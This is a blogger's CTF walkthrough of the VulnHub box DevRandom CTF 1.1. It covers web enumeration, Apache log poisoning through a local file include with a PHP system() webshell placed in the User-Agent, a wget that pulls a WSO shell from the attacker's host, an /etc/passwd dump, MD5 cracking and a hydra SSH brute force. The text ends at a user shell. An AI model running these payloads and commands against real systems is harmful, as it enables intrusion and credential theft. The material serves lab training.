Hello guys,
This is gonna be my writeup for ( DevRandom CTF: 1.1 ) from VulnHub.
For challengers and CTF players you can try it before reading my solution.
P.S:both video and text writeup are included.
Summary
https://www.youtube.com/watch?v=7d2shrQA_bs
http://192.168.1.148/
the source :
<center><br> This Page is Closed!<br><img src="seizure.jpg"><br></center>
so we have only one image … let’s download it and before that let’s run nmap and dirbuster
I prefer using wfuzz instead of dirbuster or gobuster or whatever nowdays tools !
and for the image we can use exiftool and mediainfo (for windows)
to get any hidden informations or strings
> exiftool seizure.jpg
ExifTool Version Number : 10.61
File Name : seizure.jpg
Directory : .
File Size : 181 kB
File Modification Date/Time : 2020:03:30 13:35:14+01:00
File Access Date/Time : 2020:03:30 13:35:14+01:00
File Creation Date/Time : 2020:03:30 13:35:13+01:00
File Permissions : rw-rw-rw-
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Image Width : 1294
Image Height : 736
Encoding Process : Progressive DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 1294x736
Megapixels : 0.952
-- press RETURN --
nothing looks interesting
nothing in strings too !
so let’s go back to our wfuzz run
> wfuzz -c -u "http://192.168.1.148/FUZZ" -w raft-large-files.txt --hc 404,500,403
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************
Target: http://192.168.1.148/FUZZ
Total requests: 37042
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000029: 200 1 L 6 W 74 Ch "wp-login.php"
000000123: 200 98 L 838 W 7368 Ch "readme.html"
000000199: 200 385 L 3179 W 19935 Ch "license.txt"
000000241: 200 6 L 8 W 86 Ch "robots.txt"
000000256: 200 1 L 6 W 74 Ch "wp-config.php"
000000290: 200 1 L 6 W 74 Ch "wp-trackback.php"
000000372: 200 1 L 6 W 74 Ch "."
000000392: 200 1 L 6 W 74 Ch "wp-mail.php"
000000406: 200 1 L 6 W 74 Ch "wp-cron.php"
000000441: 200 1 L 6 W 74 Ch "wp-blog-header.php"
000000455: 200 1 L 6 W 74 Ch "wp-links-opml.php"
000000001: 200 1 L 6 W 74 Ch "index.php"
000000831: 200 1 L 6 W 74 Ch "wp-load.php"
000001058: 200 1081 L 13015 107376 Ch "log.php"
W
000001066: 200 1 L 6 W 74 Ch "wp-signup.php"
000001500: 302 0 L 0 W 0 Ch "wp-activate.php"
000025413: 400 8 L 27 W 226 Ch "directory e.g."
000034083: 200 2 L 1 W 38 Ch "secret.php"
Total time: 31.41398
Processed Requests: 37042
Filtered Requests: 37024
Requests/sec.: 1179.156
it’s looks like we have a wordpress CMS but not working correctly …
Our Wappalyzer addon confirm that we are in a WordPress
CMS
WordPress
in the source code of the page “http://192.168.1.148/?include=info”
we have a weird IP “192.168.1.214” that why our wordpress looks missed up !
when they installed the wordpress on the VM the IP was 192.168.1.214 and ours 192.168.1.148
anyway let’s continue …
for many files we have the same number of words “6 W” means let’s ignore these files …
we have a kind of more words in this file
000001058: 200 1081 L 13015 107376 Ch "log.php"
let’s give it a visit
OOoh we have a kind of access log files !
view acces.log file : /var/www/html/access.log
an access log is where the apache saves the visitors informations … let’s detail a value
192.168.1.33 - - [30/Mar/2020:07:26:27 -0500] "GET / HTTP/1.1" 200 317 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0"
we have first the IP address of the visitor !
and then the date
the request method GET
the visited file or folder
the response code and finally the browser user agent
So in Local file Include exploitation we always go back to the access log so we can inject some php codes and then run its
let’s try to inject something and before that let’s see our nmap scan …
> nmap -sC -sV 192.168.1.148 --unprivileged
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-30 13:33 W. Central Africa Standard Time
Strange read error from 192.168.1.148 (203 - 'Unknown error')
Strange read error from 192.168.1.148 (203 - 'Unknown error')
Strange read error from 192.168.1.148 (203 - 'Unknown error')
Strange read error from 192.168.1.148 (203 - 'Unknown error')
Strange read error from 192.168.1.148 (203 - 'Unknown error')
Nmap scan report for 192.168.1.148
Host is up (1.0s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 83:e5:a1:51:b1:f6:98:d3:19:e7:59:10:f7:f4:e8:5e (RSA)
| 256 b2:a6:79:c3:ad:2f:ba:cc:02:b3:42:0d:a2:a3:9e:60 (ECDSA)
|_ 256 ec:1f:d4:29:9f:a5:ae:ca:93:f4:a8:6b:fd:61:44:45 (ED25519)
80/tcp open http Apache httpd
| http-robots.txt: 3 disallowed entries
|_/wp-admin/ /wp-login.php /?include=info
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
340/tcp filtered unknown
512/tcp filtered exec
2105/tcp filtered eklogin
5120/tcp filtered barracuda-bbs
18040/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 266.23 seconds
we have to known open ports as we saw in angry ip later and these ports are 22 and 80
340/tcp filtered unknown
512/tcp filtered exec
2105/tcp filtered eklogin
5120/tcp filtered barracuda-bbs
18040/tcp filtered unknown
and for these ports I swear you guys its the first time I see them but they looks kind of filtered let’s test them via netcat
no responses maybe some false results …
that doesn’t matter at least we have a webpage and a access log file viewer 
let’s inject our php code via burpsuite
so the sent request was:
GET / HTTP/1.1
Host: 192.168.1.148
User-Agent: x00xTeam !
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
the response was HTTP/1.1 200 OK which means everything going right ! let’s refresh our log.php file and see
I already refresh it before i wrote the sentence above
192.168.1.33 - - [30/Mar/2020:07:51:41 -0500] "GET / HTTP/1.1" 200 280 "-" "x00xTeam !"
so we have our new useragent … let’s inject some php codes and see if we are able to run it
GET / HTTP/1.1
Host: 192.168.1.148
User-Agent: <?php system($_GET['x']);?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
am gonna inject a system function that need a GET request to run so let’s do that
and yes we are able to run PHP codes 
# ls -la :
total 424
drwxr-xr-x 6 wordpressftp www-data 4096 Mar 23 14:13 .
drwxr-x--- 4 wordpressftp www-data 4096 Mar 22 08:25 ..
-rw-r--r-- 1 wordpressftp www-data 199 Mar 19 16:17 .htaccess
-rw-r--r-- 1 wordpressftp www-data 420 Nov 30 2017 index.php
-rw-r--r-- 1 wordpressftp www-data 19935 Jan 1 2019 license.txt
-rw-r--r-- 1 wordpressftp www-data 259 Mar 23 14:13 log.php
-rw-r--r-- 1 wordpressftp www-data 7368 Sep 2 2019 readme.html
-rw-r--r-- 1 wordpressftp www-data 86 Mar 18 21:01 robots.txt
drwxr-xr-x 2 wordpressftp www-data 4096 Mar 22 08:37 secret
-rw-r--r-- 1 wordpressftp www-data 177 Mar 19 16:43 secret.php
-rw-r--r-- 1 wordpressftp www-data 185479 Mar 19 15:53 seizure.jpg
-rw-r--r-- 1 wordpressftp www-data 6939 Sep 2 2019 wp-activate.php
drwxr-xr-x 9 wordpressftp www-data 4096 Jan 12 05:00 wp-admin
-rw-r--r-- 1 wordpressftp www-data 369 Nov 30 2017 wp-blog-header.php
-rw-r--r-- 1 wordpressftp www-data 2283 Jan 20 2019 wp-comments-post.php
-rwxrwx--- 1 wordpressftp www-data 2898 Jan 7 2019 wp-config-sample.php
-rw-r--r-- 1 wordpressftp www-data 3102 Mar 18 20:02 wp-config.php
drwxrwx--- 7 wordpressftp www-data 4096 Mar 19 15:20 wp-content
-rw-r--r-- 1 wordpressftp www-data 3955 Oct 10 17:52 wp-cron.php
drwxr-xr-x 20 wordpressftp www-data 12288 Jan 12 05:00 wp-includes
-rw-r--r-- 1 wordpressftp www-data 2504 Sep 2 2019 wp-links-opml.php
-rw-r--r-- 1 wordpressftp www-data 3326 Sep 2 2019 wp-load.php
-rw-r--r-- 1 wordpressftp www-data 47597 Dec 9 07:30 wp-login.php
-rw-r--r-- 1 wordpressftp www-data 8483 Sep 2 2019 wp-mail.php
-rw-r--r-- 1 wordpressftp www-data 19120 Oct 15 10:37 wp-settings.php
-rw-r--r-- 1 wordpressftp www-data 31112 Sep 2 2019 wp-signup.php
-rw-r--r-- 1 wordpressftp www-data 4764 Nov 30 2017 wp-trackback.php
-rw-r--r-- 1 wordpressftp www-data 3150 Jul 1 2019 xmlrpc.php.old
let’s run some commands to know more about our Box
# id :
uid=33(www-data) gid=33(www-data) groups=33(www-data)
# pwd :
/var/www/html/wordpress/
without taking time in commands let’s upload our php shell so will do that directly
first we need to find writable folders in the current dir
find /var/www/html/wordpress/ -type d -writable -ls
here is our writable directories …
" 656143 4 drwxrwx--- 7 wordpressftp www-data 4096 Mar 19 15:20 /var/www/html/wordpress/wp-content
656144 4 drwxrwx--- 4 wordpressftp www-data 4096 Mar 19 04:59 /var/www/html/wordpress/wp-content/plugins
656435 4 drwxrwx--- 4 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/languages
656445 4 drwxrwx--- 2 wordpressftp www-data 4096 Mar 18 20:48 /var/www/html/wordpress/wp-content/languages/plugins
656448 4 drwxrwx--- 2 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/languages/themes
656177 4 drwxrwx--- 5 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes
656250 4 drwxrwx--- 5 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentyseventeen
656297 4 drwxrwx--- 5 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentyseventeen/assets
656306 4 drwxrwx--- 2 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentyseventeen/assets/css
656313 4 drwxrwx--- 2 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentyseventeen/assets/images
656298 4 drwxrwx--- 2 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentyseventeen/assets/js
656284 4 drwxrwx--- 2 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentyseventeen/inc
656258 4 drwxrwx--- 7 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentyseventeen/template-parts
656268 4 drwxrwx--- 2 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentyseventeen/template-parts/post
656264 4 drwxrwx--- 2 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentyseventeen/template-parts/page
656262 4 drwxrwx--- 2 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentyseventeen/template-parts/navigation
656259 4 drwxrwx--- 2 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentyseventeen/template-parts/footer
656276 4 drwxrwx--- 2 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentyseventeen/template-parts/header
656319 4 drwxrwx--- 8 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentynineteen
656362 4 drwxrwx--- 2 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentynineteen/inc
656334 4 drwxrwx--- 6 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentynineteen/template-parts
656337 4 drwxrwx--- 2 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentynineteen/template-parts/post
656340 4 drwxrwx--- 2 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentynineteen/template-parts/content
656335 4 drwxrwx--- 2 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentynineteen/template-parts/footer
656346 4 drwxrwx--- 2 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentynineteen/template-parts/header
656327 4 drwxrwx--- 2 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentynineteen/js
656322 4 drwxrwx--- 2 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentynineteen/fonts
656377 4 drwxrwx--- 13 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentynineteen/sass
656420 4 drwxrwx--- 2 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentynineteen/sass/mixins
656423 4 drwxrwx--- 2 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentynineteen/sass/variables-site
656416 4 drwxrwx--- 2 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentynineteen/sass/modules
656388 4 drwxrwx--- 2 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentynineteen/sass/elements
656392 4 drwxrwx--- 2 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentynineteen/sass/navigation
656378 4 drwxrwx--- 2 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentynineteen/sass/media
656399 4 drwxrwx--- 6 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentynineteen/sass/site
656403 4 drwxrwx--- 2 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentynineteen/sass/site/primary
656407 4 drwxrwx--- 2 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentynineteen/sass/site/secondary
656400 4 drwxrwx--- 2 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentynineteen/sass/site/footer
656409 4 drwxrwx--- 2 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentynineteen/sass/site/header
656412 4 drwxrwx--- 2 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentynineteen/sass/forms
656384 4 drwxrwx--- 2 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentynineteen/sass/typography
656431 4 drwxrwx--- 2 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentynineteen/sass/layout
656382 4 drwxrwx--- 2 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentynineteen/sass/blocks
656356 4 drwxrwx--- 2 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentynineteen/classes
656178 4 drwxrwx--- 7 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentytwenty
656222 4 drwxrwx--- 6 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentytwenty/assets
656235 4 drwxrwx--- 2 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentytwenty/assets/css
656240 4 drwxrwx--- 2 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentytwenty/assets/images
656227 4 drwxrwx--- 2 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentytwenty/assets/js
656223 4 drwxrwx--- 3 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentytwenty/assets/fonts
656224 4 drwxrwx--- 2 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentytwenty/assets/fonts/inter
656208 4 drwxrwx--- 2 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentytwenty/inc
656185 4 drwxrwx--- 2 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentytwenty/template-parts
656218 4 drwxrwx--- 2 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentytwenty/templates
656198 4 drwxrwx--- 2 wordpressftp www-data 4096 Jan 12 05:00 /var/www/html/wordpress/wp-content/themes/twentytwenty/classes
655416 4 drwxrwx--- 3 www-data www-data 4096 Mar 18 20:03 /var/www/html/wordpress/wp-content/uploads
657692 4 drwxrwx--- 3 www-data www-data 4096 Mar 18 20:03 /var/www/html/wordpress/wp-content/uploads/2020
657693 4 drwxrwx--- 2 www-data www-data 4096 Mar 19 07:04 /var/www/html/wordpress/wp-content/uploads/2020/03
let’s upload it inside this folder
/var/www/html/wordpress/wp-content
the command:
cd /var/www/html/wordpress/wp-content/;wget http://192.168.1.33:8080/dz_wso.php;ls -la
and we are in
http://192.168.1.148/wp-content/dz_wso.php
I like using this shell it facilate me many things and I always prefer interfaces and windows …
so let’s get the max informations we can take from the server we have a long way to the root
Linux lucifer 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64
$ ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.9 103976 10088 ? Ss 07:25 0:01 /sbin/init
root 2 0.0 0.0 0 0 ? S 07:25 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? I< 07:25 0:00 [rcu_gp]
root 4 0.0 0.0 0 0 ? I< 07:25 0:00 [rcu_par_gp]
root 6 0.0 0.0 0 0 ? I< 07:25 0:00 [kworker/0:0H-kblockd]
root 8 0.0 0.0 0 0 ? I< 07:25 0:00 [mm_percpu_wq]
root 9 0.0 0.0 0 0 ? S 07:25 0:00 [ksoftirqd/0]
root 10 0.0 0.0 0 0 ? I 07:25 0:00 [rcu_sched]
root 11 0.0 0.0 0 0 ? I 07:25 0:00 [rcu_bh]
root 12 0.0 0.0 0 0 ? S 07:25 0:00 [migration/0]
root 14 0.0 0.0 0 0 ? S 07:25 0:00 [cpuhp/0]
root 15 0.0 0.0 0 0 ? S 07:25 0:00 [kdevtmpfs]
root 16 0.0 0.0 0 0 ? I< 07:25 0:00 [netns]
root 17 0.0 0.0 0 0 ? S 07:25 0:00 [kauditd]
root 18 0.0 0.0 0 0 ? S 07:25 0:00 [khungtaskd]
root 19 0.0 0.0 0 0 ? S 07:25 0:00 [oom_reaper]
root 20 0.0 0.0 0 0 ? I< 07:25 0:00 [writeback]
root 21 0.0 0.0 0 0 ? S 07:25 0:00 [kcompactd0]
root 22 0.0 0.0 0 0 ? SN 07:25 0:00 [ksmd]
root 23 0.0 0.0 0 0 ? SN 07:25 0:00 [khugepaged]
root 24 0.0 0.0 0 0 ? I< 07:25 0:00 [crypto]
root 25 0.0 0.0 0 0 ? I< 07:25 0:00 [kintegrityd]
root 26 0.0 0.0 0 0 ? I< 07:25 0:00 [kblockd]
root 27 0.0 0.0 0 0 ? I< 07:25 0:00 [edac-poller]
root 28 0.0 0.0 0 0 ? I< 07:25 0:00 [devfreq_wq]
root 29 0.0 0.0 0 0 ? S 07:25 0:00 [watchdogd]
root 30 0.0 0.0 0 0 ? S 07:25 0:00 [kswapd0]
root 48 0.0 0.0 0 0 ? I< 07:25 0:00 [kthrotld]
root 49 0.0 0.0 0 0 ? I< 07:25 0:00 [ipv6_addrconf]
root 50 0.0 0.0 0 0 ? I 07:25 0:00 [kworker/u2:1-events_unbound]
root 59 0.0 0.0 0 0 ? I< 07:25 0:00 [kstrp]
root 96 0.0 0.0 0 0 ? I 07:25 0:01 [kworker/0:2-memcg_kmem_cache]
root 106 0.0 0.0 0 0 ? I< 07:25 0:00 [ata_sff]
root 108 0.0 0.0 0 0 ? S 07:25 0:00 [scsi_eh_0]
root 109 0.0 0.0 0 0 ? I< 07:25 0:00 [scsi_tmf_0]
root 110 0.0 0.0 0 0 ? S 07:25 0:00 [scsi_eh_1]
root 112 0.0 0.0 0 0 ? I< 07:25 0:00 [scsi_tmf_1]
root 113 0.0 0.0 0 0 ? S 07:25 0:00 [scsi_eh_2]
root 115 0.0 0.0 0 0 ? I 07:25 0:00 [kworker/u2:2-flush-8:0]
root 116 0.0 0.0 0 0 ? I< 07:25 0:00 [scsi_tmf_2]
root 153 0.0 0.0 0 0 ? I< 07:25 0:00 [kworker/0:1H-kblockd]
root 184 0.0 0.0 0 0 ? I< 07:25 0:00 [kworker/u3:0]
root 186 0.0 0.0 0 0 ? S 07:25 0:00 [jbd2/sda1-8]
root 187 0.0 0.0 0 0 ? I< 07:25 0:00 [ext4-rsv-conver]
root 221 0.0 0.7 32188 7752 ? Ss 07:25 0:00 /lib/systemd/systemd-journald
root 249 0.0 0.5 22452 5452 ? Ss 07:25 0:00 /lib/systemd/systemd-udevd
systemd+ 283 0.0 0.6 93080 6356 ? Ssl 07:25 0:00 /lib/systemd/systemd-timesyncd
root 323 0.0 0.0 0 0 ? I< 07:25 0:00 [ttm_swap]
root 324 0.0 0.0 0 0 ? S 07:25 0:00 [irq/18-vmwgfx]
message+ 367 0.0 0.4 8972 4348 ? Ss 07:25 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root 368 0.0 0.7 19400 7092 ? Ss 07:25 0:00 /lib/systemd/systemd-logind
root 369 0.0 0.2 8504 2768 ? Ss 07:25 0:00 /usr/sbin/cron -f
root 370 0.0 0.3 225824 3820 ? Ssl 07:25 0:00 /usr/sbin/rsyslogd -n -iNONE
root 382 0.0 0.5 9488 5692 ? Ss 07:25 0:00 /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3
root 406 0.0 1.9 110360 20204 ? Ssl 07:25 0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
root 408 0.0 0.1 5612 1504 tty1 Ss+ 07:25 0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
mysql 490 0.0 9.3 1264720 94088 ? Ssl 07:25 0:02 /usr/sbin/mysqld
root 499 0.0 0.6 15852 7032 ? Ss 07:25 0:00 /usr/sbin/sshd -D
root 539 0.0 2.4 215156 24616 ? Ss 07:26 0:00 /usr/sbin/apache2 -k start
proftpd 670 0.0 0.3 24016 3676 ? Ss 07:26 0:00 proftpd: (accepting connections)
www-data 1109 0.0 3.4 220452 34668 ? S 07:26 0:00 /usr/sbin/apache2 -k start
www-data 1110 0.0 3.5 218424 36148 ? S 07:26 0:00 /usr/sbin/apache2 -k start
www-data 1111 0.0 3.8 218488 38480 ? S 07:26 0:01 /usr/sbin/apache2 -k start
www-data 1112 0.0 3.3 218744 33468 ? S 07:26 0:00 /usr/sbin/apache2 -k start
www-data 1179 0.0 3.4 220516 34476 ? S 07:26 0:00 /usr/sbin/apache2 -k start
www-data 1513 0.0 3.7 218680 37932 ? S 07:35 0:00 /usr/sbin/apache2 -k start
www-data 1514 0.0 3.2 218468 32652 ? S 07:35 0:00 /usr/sbin/apache2 -k start
www-data 1515 0.0 3.7 216372 37924 ? S 07:35 0:00 /usr/sbin/apache2 -k start
www-data 1516 0.0 3.7 218680 37984 ? S 07:35 0:00 /usr/sbin/apache2 -k start
www-data 1519 0.0 3.7 216376 37868 ? S 07:35 0:00 /usr/sbin/apache2 -k start
root 1605 0.0 0.0 0 0 ? I 07:57 0:00 [kworker/0:1-ata_sff]
root 1622 0.0 0.0 0 0 ? I 08:02 0:00 [kworker/0:0-ata_sff]
www-data 1645 0.0 0.0 2388 700 ? S 08:03 0:00 sh -c ps aux
www-data 1646 0.0 0.2 7640 2700 ? R 08:03 0:00 ps aux
nothing weird or special in process list !
the passwd file:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
_apt:x:103:65534::/nonexistent:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
john:x:1000:1000:john,,,:/home/john:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lisa:x:1001:1001:,,,:/home/lisa:/bin/bash
henri:x:1002:1002:,,,:/home/henri:/bin/bash
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
proftpd:x:107:65534::/run/proftpd:/usr/sbin/nologin
ftp:x:108:65534::/srv/ftp:/usr/sbin/nologin
wordpressftp:x:1003:1003:,,,:/var/www/html:/bin/rbash
victor:x:1004:1004:,,,:/home/victor:/bin/bash
trevor:x:1005:1005:,,,:/home/trevor:/bin/bash
and what we need from it specially is the users that have access to consoles like : bash / sh / rbash …
root:x:0:0:root:/root:/bin/bash
john:x:1000:1000:john,,,:/home/john:/bin/bash
lisa:x:1001:1001:,,,:/home/lisa:/bin/bash
henri:x:1002:1002:,,,:/home/henri:/bin/bash
wordpressftp:x:1003:1003:,,,:/var/www/html:/bin/rbash
victor:x:1004:1004:,,,:/home/victor:/bin/bash
trevor:x:1005:1005:,,,:/home/trevor:/bin/bash
the users in the box are:
henri
john
lisa
root
trevor
victor
wordpressftp
now let’s try to get some passwords …
there is a weird file secret.php
<?php //
Echo "API:";
echo md5(base64_encode("
This stupid webadmin doesn't give me log access..
but i have his creds {victor:00a00cfc5745c3b59202ab06a67bb2dc}
"));
?>
containing a MD5 hash (the length is 32)
00a00cfc5745c3b59202ab06a67bb2dc:irminsul
let’s continue looking for passwords …
we don’t have access to home users …
so let’s make a quick brute forcing for SSH with hydra
> hydra -L userlist.txt -P passlist.txt ssh://192.168.1.148 -s 22 ssh
-L is for users list
-P is for passwordlist
ssh://192.168.1.148
the IP address of the server
-s for port (22)
ssh ==> the service name (ftp , smtp …)
> hydra -L userlist.txt -P passlist.txt ssh://192.168.1.148 -s 22 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-03-30 14:12:04
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 21 login tries (l:7/p:0), ~3 tries per task
[DATA] attacking ssh://192.168.1.148:22/
[22][ssh] host: 192.168.1.148 login: victor password: irminsul
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-03-30 14:12:12
and we have some true credentianls
[22][ssh] host: 192.168.1.148 login: victor password: irminsul
let’s go to ssh
and we are in
> ssh [email protected]
The authenticity of host '192.168.1.148 (192.168.1.148)' can't be established.
ECDSA key fingerprint is SHA256:qOCG5GMfENFo0Ox4TwxKShT8MsvBvYvR/ImJ1NHt5Go.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.148' (ECDSA) to the list of known hosts.
[email protected]'s password:
Linux lucifer 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Mar 24 15:48:26 2020 from 192.168.1.24
victor@lucifer:~$
victor@lucifer:~$ id
uid=1004(victor) gid=1004(victor) groups=1004(victor)
victor@lucifer:~$ pwd
/home/victor
victor@lucifer:~$ ls -la
total 32
drwxr-x--- 4 victor victor 4096 Mar 25 06:08 .
drwxr-xr-x 7 root root 4096 Mar 23 16:29 ..
-rw-r--r-- 1 victor victor 220 Mar 19 06:43 .bash_logout
-rw-r--r-- 1 victor victor 3526 Mar 19 06:43 .bashrc
drwxr-xr-x 2 victor victor 4096 Mar 19 15:32 bin
drwx------ 3 victor victor 4096 Mar 19 08:10 .gnupg
-rw-r--r-- 1 victor victor 675 Mar 19 06:43 .profile
-rw------- 1 victor victor 53 Mar 19 17:27 .Xauthority
victor@lucifer:~$ cd bin
